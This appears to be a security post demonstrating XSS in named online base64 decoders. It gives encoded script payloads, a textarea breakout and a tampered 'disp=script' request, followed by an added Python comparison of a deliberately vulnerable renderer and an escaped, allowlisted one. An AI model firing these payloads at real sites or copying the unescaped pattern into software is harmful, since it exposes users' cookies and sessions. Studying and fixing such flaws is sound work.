The idea is to give a decoder some data to decode (base64 in this case) and see whether we can inject XSS through the decoded output.
http://base64-decode.php-functions.com/
Other websites:
http://www.motobit.com/util/base64-decoder-encoder.asp
http://www.shell-tools.net/index.php?op=base64_dec
We need to submit this string, base64-encoded:
-------------------------------------------------------------
<html><head></head><body></textarea><script>alert(document.cookie);</script><textarea></body></html>
-------------------------------------------------------------
PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5PjwvdGV4dGFyZWE+PHNjcmlwdD5hbGVydChkb2N1bWVu
dC5jb29raWUpOzwvc2NyaXB0Pjx0ZXh0YXJlYT48L2JvZHk+PC9odG1sPg==
-------------------------------------------------------------
Note: the <textarea> tags are not needed in this case, but they work in 90% of other similar cases, where the result is shown in a textarea.
A different one, with a text input:
http://nc-designs.co.uk/tools/Base64 Encryption and Decryption/
----------------------------------------
"><script>alert(document.cookie);</script><"
----------------------------------------
Ij48c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk7PC9zY3JpcHQ+PCI=
----------------------------------------
I've found another, more trivial base64 decoder, with a few differences:
http://www.toastedspam.com/decode64
- it doesn't decode the data correctly
- it tries to remove < and > or convert them to HTML entities
I spent about ten minutes (sic) to achieve this XSS.
The string to convert (b=a; is garbage, added so that the string decodes cleanly, without random characters):
a=document.cookie; b=a; alert(a);
The converted string:
YT1kb2N1bWVudC5jb29raWU7IGI9YTsgYWxlcnQoYSk7
When we submit the data, we should use Tamper Data (or Firebug, to change the HTML) and change disp to script (disp=script):
text=YT1kb2N1bWVudC5jb29raWU7IGI9YTsgYWxlcnQoYSk7&disp=script
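The flaw shared by the decoders above, next to a hardened rendering, as an added example that is not part of the original post and is not the code of any of these sites. The function names, the page markup and the `disp` allowlist values are hypothetical, and it assumes `disp` selects the element that wraps the decoded output.

```python
import base64
import binascii
import html

# Constructed allowlist for a display-mode parameter like `disp` (assumption:
# the parameter selects the element that wraps the decoded output).
ALLOWED_DISP = {"pre", "textarea"}


def decode_b64(data: str) -> str:
    """Strictly decode base64 and reject malformed input."""
    try:
        raw = base64.b64decode(data, validate=True)
    except (binascii.Error, ValueError) as exc:
        raise ValueError("not valid base64") from exc
    # The decoded bytes are untrusted text, whatever they look like.
    return raw.decode("utf-8", errors="replace")


def render_vulnerable(data: str) -> str:
    """Flawed pattern: decoded text is concatenated into the markup as-is."""
    text = decode_b64(data)
    return f'<textarea>{text}</textarea><input type="text" value="{text}">'


def render_safe(data: str, disp: str = "textarea") -> str:
    """Escape for element-body and quoted-attribute contexts."""
    if disp not in ALLOWED_DISP:
        disp = "textarea"  # a request parameter never chooses the tag name
    text = html.escape(decode_b64(data), quote=True)
    return f'<{disp}>{text}</{disp}><input type="text" value="{text}">'


if __name__ == "__main__":
    # Encoded strings taken from the post above.
    for sample, disp in (
        ("Ij48c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk7PC9zY3JpcHQ+PCI=", "textarea"),
        ("YT1kb2N1bWVudC5jb29raWU7IGI9YTsgYWxlcnQoYSk7", "script"),
    ):
        print("vulnerable:", render_vulnerable(sample))
        print("safe      :", render_safe(sample, disp))
```

The second sample contains no HTML metacharacters, so escaping alone leaves it unchanged; it is the allowlist on the wrapping element that keeps it inert.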